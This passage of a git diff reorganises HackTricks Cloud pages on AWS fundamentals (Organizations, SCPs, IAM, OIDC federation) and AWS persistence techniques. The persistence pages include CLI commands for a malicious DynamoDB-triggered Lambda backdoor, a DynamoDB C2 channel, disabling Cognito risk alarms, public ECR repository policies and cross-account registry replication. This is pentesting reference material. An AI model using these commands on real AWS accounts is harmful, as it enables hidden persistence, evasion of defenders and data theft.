accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. - * Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). + The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. + +- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. + - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). ``` aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com @@ -61,25 +49,26 @@ A **service control policy (SCP)** is a policy that specifies the services and a This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). -{% hint style="warning" %} -Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. -{% endhint %} +> [!WARNING] +> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. SCP examples: -* Deny the root account entirely -* Only allow specific regions -* Only allow white-listed services -* Deny GuardDuty, CloudTrail, and S3 Public Block Access from +- Deny the root account entirely +- Only allow specific regions +- Only allow white-listed services +- Deny GuardDuty, CloudTrail, and S3 Public Block Access from - being disabled -* Deny security/incident response roles from being deleted or + being disabled - modified. -* Deny backups from being deleted. -* Deny creating IAM users and access keys +- Deny security/incident response roles from being deleted or -Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_manage\_policies\_scps\_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) + modified. + +- Deny backups from being deleted. +- Deny creating IAM users and access keys + +Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) ### ARN @@ -92,18 +81,18 @@ arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env Note that there are 4 partitions in AWS but only 3 ways to call them: -* AWS Standard: `aws` -* AWS China: `aws-cn` -* AWS US public Internet (GovCloud): `aws-us-gov` -* AWS Secret (US Classified): `aws` +- AWS Standard: `aws` +- AWS China: `aws-cn` +- AWS US public Internet (GovCloud): `aws-us-gov` +- AWS Secret (US Classified): `aws` ## IAM - Identity and Access Management IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. -* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. -* **Access Control** - The method and process of how access is granted to a secure resource +- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. +- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. +- **Access Control** - The method and process of how access is granted to a secure resource IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. @@ -125,8 +114,8 @@ Users can have **MFA enabled to login** through the console. API tokens of MFA e #### CLI -* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). +- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT +- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). Whenever you need to **change the Access Key** this is the process you should follow:\ &#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ @@ -138,9 +127,9 @@ You can use a **free virtual application or a physical device**. You can use app Policies with MFA conditions can be attached to the following: -* An IAM user or group -* A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic -* The trust policy of an IAM role that can be assumed by a user +- An IAM user or group +- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic +- The trust policy of an IAM role that can be assumed by a user If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ Note that **`AssumeRole` credentials don't contain this information**. @@ -159,10 +148,10 @@ You can attach an **identity-based policy to a user group** so that all of the * Here are some important characteristics of user groups: -* A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. -* **User groups can't be nested**; they can contain only users, not other user groups. -* There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. -* The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). +- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. +- **User groups can't be nested**; they can contain only users, not other user groups. +- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. +- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). ### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) @@ -184,8 +173,8 @@ AWS Security Token Service (STS) is a web service that facilitates the **issuanc Are used to assign permissions. There are 2 types: -* AWS managed policies (preconfigured by AWS) -* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. +- AWS managed policies (preconfigured by AWS) +- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. By **default access** is **denied**, access will be granted if an explicit role has been specified.\ If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). @@ -200,7 +189,7 @@ If **single "Deny" exist, it will override the "Allow"**, except for requests th "Action": [ //Actions that will be allowed or denied "ec2:AttachVolume", "ec2:DetachVolume" - ], + ], "Resource": [ //Resource the action and effect will be applied to "arn:aws:ec2:*:*:volume/*", "arn:aws:ec2:*:*:instance/*" @@ -262,7 +251,7 @@ To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth) However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. -
+
### IAM Identity Center @@ -272,11 +261,11 @@ The login domain is going to be something like `.awsapps.com`. To login users, there are 3 identity sources that can be used: -* Identity Center Directory: Regular AWS users -* Active Directory: Supports different connectors -* External Identity Provider: All users and groups come from an external Identity Provider (IdP) +- Identity Center Directory: Regular AWS users +- Active Directory: Supports different connectors +- External Identity Provider: All users and groups come from an external Identity Provider (IdP) -
+
In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. @@ -297,13 +286,13 @@ It's recommended to **specify the user who is trusted and not put some generic t Not supported: -* Trust Relations -* AD Admin Center -* Full PS API support -* AD Recycle Bin -* Group Managed Service Accounts -* Schema Extensions -* No Direct access to OS or Instances +- Trust Relations +- AD Admin Center +- Full PS API support +- AD Recycle Bin +- Group Managed Service Accounts +- Schema Extensions +- No Direct access to OS or Instances #### Web Federation or OpenID Authentication @@ -311,8 +300,8 @@ The app uses the AssumeRoleWithWebIdentity to create temporary credentials. Howe ### Other IAM options -* You can **set a password policy setting** options like minimum length and password requirements. -* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. +- You can **set a password policy setting** options like minimum length and password requirements. +- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. @@ -338,14 +327,14 @@ In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_id The following privileges grant various read access of metadata: -* `arn:aws:iam::aws:policy/SecurityAudit` -* `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` -* `codebuild:ListProjects` -* `config:Describe*` -* `cloudformation:ListStacks` -* `logs:DescribeMetricFilters` -* `directconnect:DescribeConnections` -* `dynamodb:ListTables` +- `arn:aws:iam::aws:policy/SecurityAudit` +- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` +- `codebuild:ListProjects` +- `config:Describe*` +- `cloudformation:ListStacks` +- `logs:DescribeMetricFilters` +- `directconnect:DescribeConnections` +- `dynamodb:ListTables` ## Misc @@ -390,21 +379,8 @@ If you are looking for something **similar** to this but for the **browser** you ## References -* [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_getting-started\_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) -* [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) -* [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) +- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) +- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) +- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md similarity index 53% rename from pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md rename to src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md index e4f155bd0..6e25b21fe 100644 --- a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -1,25 +1,14 @@ # AWS - Federation Abuse -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SAML For info about SAML please check: -{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/saml-attacks +{{#endref}} In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) @@ -32,7 +21,7 @@ In order to add a github action as Identity provider: 3. Click on _Get thumbprint_ to get the thumbprint of the provider 4. For _Audience_, enter `sts.amazonaws.com` 5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: - * ```json + - ```json { "Version": "2012-10-17", "Statement": [ @@ -60,33 +49,33 @@ In order to add a github action as Identity provider: 8. Finally use a github action to configure the AWS creds to be used by the workflow: ```yaml -name: 'test AWS Access' - +name: "test AWS Access" + # The workflow should only trigger on pull requests to the main branch on: pull_request: branches: - main - + # Required to get the ID Token that will be used for OIDC permissions: id-token: write contents: read # needed for private repos to checkout - + jobs: aws: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v3 - + - name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: aws-region: eu-west-1 - role-to-assume: ${{ secrets.READ_ROLE }} + role-to-assume:${{ secrets.READ_ROLE }} role-session-name: OIDCSession - + - run: aws sts get-caller-identity shell: bash ``` @@ -107,21 +96,21 @@ It's possible to generate **OIDC providers** in an **EKS** cluster simply by set ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" } - ] + } + } + ] } ``` @@ -129,27 +118,12 @@ This policy is correctly indicating than **only** the **EKS cluster** with **id* In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: -{% code overflow="wrap" %} ```bash "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", ``` -{% endcode %} ## References -* [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) +- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md new file mode 100644 index 000000000..0135472a0 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md @@ -0,0 +1,17 @@ +# AWS - Permissions for a Pentest + +{{#include ../../banners/hacktricks-training.md}} + +These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: + +- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) +- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: + - **access-analyzer:List\*** + - **access-analyzer:Get\*** + - **iam:CreateServiceLinkedRole** + - **access-analyzer:CreateAnalyzer** + - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) + - **access-analyzer:DeleteAnalyzer** + - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-persistence/README.md rename to src/pentesting-cloud/aws-security/aws-persistence/README.md diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md new file mode 100644 index 000000000..2026f7c2f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md @@ -0,0 +1,32 @@ +# AWS - API Gateway Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## API Gateway + +For more information go to: + +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} + +### Resource Policy + +Modify the resource policy of the API gateway(s) to grant yourself access to them + +### Modify Lambda Authorizers + +Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ +Or just remove the use of the authorizer. + +### IAM Permissions + +If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ +Or just remove the use of the authorizer. + +### API Keys + +If API keys are used, you could leak them to maintain persistence or even create new ones.\ +Or just remove the use of API keys. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md new file mode 100644 index 000000000..0c7c000bb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md @@ -0,0 +1,42 @@ +# AWS - Cognito Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Cognito + +For more information, access: + +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} + +### User persistence + +Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: + +- **Adding a User Pool** controlled by the user to an Identity Pool +- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** + - Or to an **authenticated Identity Pool** if the attacker can login + - Or **improve the permissions** of the given roles +- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** +- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool + +Check how to do these actions in + +{{#ref}} +../aws-privilege-escalation/aws-cognito-privesc.md +{{#endref}} + +### `cognito-idp:SetRiskConfiguration` + +An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: + +```bash +aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} +``` + +By default this is disabled: + +
+ +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md new file mode 100644 index 000000000..e37a874e8 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md @@ -0,0 +1,63 @@ +# AWS - DynamoDB Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +### DynamoDB + +For more information access: + +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} + +### DynamoDB Triggers with Lambda Backdoor + +Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. + +```bash +# Create a malicious Lambda function +aws lambda create-function \ + --function-name MaliciousFunction \ + --runtime nodejs14.x \ + --role \ + --handler index.handler \ + --zip-file fileb://malicious_function.zip \ + --region + +# Associate the Lambda function with the DynamoDB table as a trigger +aws dynamodbstreams describe-stream \ + --table-name TargetTable \ + --region + +# Note the "StreamArn" from the output +aws lambda create-event-source-mapping \ + --function-name MaliciousFunction \ + --event-source \ + --region +``` + +To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. + +### DynamoDB as a C2 Channel + +An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. + +```bash +# Create a DynamoDB table for C2 +aws dynamodb create-table \ + --table-name C2Table \ + --attribute-definitions AttributeName=CommandId,AttributeType=S \ + --key-schema AttributeName=CommandId,KeyType=HASH \ + --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ + --region + +# Insert a command into the table +aws dynamodb put-item \ + --table-name C2Table \ + --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ + --region +``` + +The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md new file mode 100644 index 000000000..4c87fda79 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md @@ -0,0 +1,54 @@ +# AWS - EC2 Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## EC2 + +For more information check: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} + +### Security Group Connection Tracking Persistence + +If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. + +If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** + +### EC2 Lifecycle Manager + +This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ +An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. + +### Scheduled Instances + +It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. + +### Spot Fleet Request + +Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +- Using a traditional **rootkit** for example +- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) +- Backdooring the **User Data** + +### **Backdoor Launch Configuration** + +- Backdoor the used AMI +- Backdoor the User Data +- Backdoor the Key Pair + +### VPN + +Create a VPN so the attacker will be able to connect directly through i to the VPC. + +### VPC Peering + +Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md new file mode 100644 index 000000000..2efeb83cb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -0,0 +1,97 @@ +# AWS - ECR Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## ECR + +For more information check: + +{{#ref}} +../aws-services/aws-ecr-enum.md +{{#endref}} + +### Hidden Docker Image with Malicious Code + +An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. + +### Repository Policy + +Add a policy to a single repository granting yourself (or everybody) access to a repository: + +```bash +aws ecr set-repository-policy \ + --repository-name cluster-autoscaler \ + --policy-text file:///tmp/my-policy.json + +# With a .json such as + +{ + "Version" : "2008-10-17", + "Statement" : [ + { + "Sid" : "allow public pull", + "Effect" : "Allow", + "Principal" : "*", + "Action" : [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +> [!WARNING] +> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. + +### Registry Policy & Cross-account Replication + +It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. + +
+ +First, you need to give the external account access over the registry with a **registry policy** like: + +```bash +aws ecr put-registry-policy --policy-text file://my-policy.json + +# With a .json like: + +{ + "Sid": "asdasd", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::947247140022:root" + }, + "Action": [ + "ecr:CreateRepository", + "ecr:ReplicateImage" + ], + "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +} +``` + +Then apply the replication config: + +```bash +aws ecr put-replication-configuration \ + --replication-configuration file://replication-settings.json \ + --region us-west-2 + +# Having the .json a content such as: +{ + "rules": [{ + "destinations": [{ + "region": "destination_region", + "registryId": "destination_accountId" + }], + "repositoryFilters": [{ + "filter": "repository_prefix_name", + "filterType": "PREFIX_MATCH" + }] + }] +} +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md similarity index 50% rename from pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md index 0b79be73e..da975a970 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md @@ -1,33 +1,19 @@ # AWS - ECS Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECS For more information check: -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} ### Hidden Periodic ECS Task -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. @@ -62,9 +48,8 @@ aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ ### Backdoor Container in Existing ECS Task Definition -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. @@ -90,9 +75,8 @@ aws ecs register-task-definition --family "existing-task" --container-definition ### Undocumented ECS Service -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. @@ -112,17 +96,4 @@ aws ecs register-task-definition --family "malicious-task" --container-definitio aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
